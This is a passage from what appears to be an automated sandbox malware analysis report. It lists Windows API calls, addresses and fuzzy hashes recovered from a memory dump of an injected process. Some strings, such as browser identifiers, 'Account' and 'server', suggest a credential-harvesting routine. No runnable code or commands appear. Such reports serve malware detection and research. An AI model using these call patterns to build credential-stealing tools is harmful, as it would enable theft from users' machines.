                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1828521557-0
                                                                                                                                                                                                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406942
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 609303285-0
                                                                                                                                                                                                                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2136311172-0
                                                                                                                                                                                                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1936579350-0
                                                                                                                                                                                                                          • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2565263379-0
                                                                                                                                                                                                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004098B5
                                                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2014503067-0
                                                                                                                                                                                                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                                                                                                                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7652DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                                                                                                                                                          • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                          • API String ID: 403622227-2664311388
                                                                                                                                                                                                                          • Opcode ID: 9ff8ff26e0a1215cc788cdf92f51d6490e6f9aaf937717d3b4e57f86d92aad15
                                                                                                                                                                                                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ff8ff26e0a1215cc788cdf92f51d6490e6f9aaf937717d3b4e57f86d92aad15
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040269B
                                                                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004026FF
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                                                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                          • API String ID: 577499730-1134094380
                                                                                                                                                                                                                          • Opcode ID: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
                                                                                                                                                                                                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                          • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                          • API String ID: 2787044678-1921111777
                                                                                                                                                                                                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                          • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                          • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004133FC
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                          • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 829165378-0
                                                                                                                                                                                                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
